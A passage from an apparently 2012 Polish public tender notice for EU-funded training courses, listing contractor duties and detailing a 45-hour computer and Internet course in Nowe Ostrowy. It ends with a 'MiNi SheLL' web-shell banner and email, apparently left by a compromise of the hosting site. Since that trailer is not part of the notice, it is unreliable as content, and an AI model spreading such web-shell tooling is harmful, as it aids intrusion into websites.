-zapewnić uczestnikom zajęć wyżywienie: tj. posiłek regeneracyjny (obiad - zupa , porcja mięsa, surówka, ziemniaki/kasza/ryż, kompot lub napój), kawa, herbata, bułka słodka codziennie dla każdego uczestnika;
-pokryć koszty badań lekarskich uczestników szkolenia - zaświadczenie o zdolności do pracy w charakterze ogrodnika zieleni;
-prowadzić dokumentację fotograficzną z przeprowadzonych zajęć a po zakończeniu dostarczyć płytę do Zamawiającego;
-ubezpieczyć uczestników zajęć od następstw nieszczęśliwych wypadków na czas trwania szkoleń oraz w drodze do i  z miejsca szkolenia. Koszt ubezpieczenia NNW należy ująć w koszcie zajęć.
-informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej,                      a także oznakować miejsce realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1                      z 27.12.2006) i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013. 
-przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu zajęć, m. in. na podstawie formularza ankiety oceniającej, jak również  przedstawić jej wyniki Zamawiającemu. 
-przekazać przed podpisaniem umowy Zamawiającemu oraz uczestnikom szkolenia na pierwszych zajęciach  harmonogram realizowanych zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs  Podstaw obsługi komputera i poruszanie się po Internecie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs  Podstaw obsługi komputera i poruszanie się po Internecie dla 13 uczestników w tym 2 osoby niepełnosprawne  w wymiarze 45 godzin (lekcyjnych) zajęć grupowych.
Wykonawca na czas trwania zajęć zobowiązany jest:
-przeprowadzić kurs Podstaw obsługi komputera i poruszania się po Internecie  na terenie gminy Nowe Ostrowy 
-przeprowadzić kurs Podstaw obsługi komputera i poruszania się po Internecie  od poniedziałku do piątku w ilości maksymalnie 7 godzin lekcyjnych dziennie z zapewnieniem przynajmniej jednej przerwy na posiłek, 
-wyposażyć sale wykładowe w odpowiedni sprzęt dydaktyczny, a uczestników zajęć w materiały szkoleniowe niezbędne do prawidłowej realizacji programu szkolenia (długopis, skrypt, zeszyt oraz inne niezbędne materiały potrzebne do przeprowadzenia zajęć);
-dostarczyć komplet materiałów szkoleniowych Zamawiającemu;
-zapewnić warunki zgodnie z przepisami BHP w trakcie trwania zajęć.
-zapewnić uczestnikom zajęć wyżywienie: tj. posiłek regeneracyjny (obiad), kawa, herbata, bułka słodka codziennie dla każdego uczestnika.
-prowadzić dokumentację fotograficzną z przeprowadzonych zajęć a po zakończeniu dostarczyć płytę do Zamawiającego;
-ubezpieczyć uczestników zajęć od następstw nieszczęśliwych wypadków na czas trwania szkoleń oraz w drodze do i  z miejsca szkolenia. Koszt ubezpieczenia NNW należy ująć w koszcie zajęć.
-informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej,                      a także oznakować miejsce realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1                      z 27.12.2006) i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013. 
-przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu zajęć, m. in. na podstawie formularza ankiety oceniającej, jak również  przedstawić jej wyniki Zamawiającemu. 
-przekazać przed podpisaniem umowy Zamawiającemu oraz uczestnikom szkolenia na pierwszych zajęciach  harmonogram realizowanych zajęć z uwzględnieniem następujących zagadnień: edytor tekstu Word, arkusz kalkulacyjny Exel, Power Point oraz poruszanie się po Internecie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com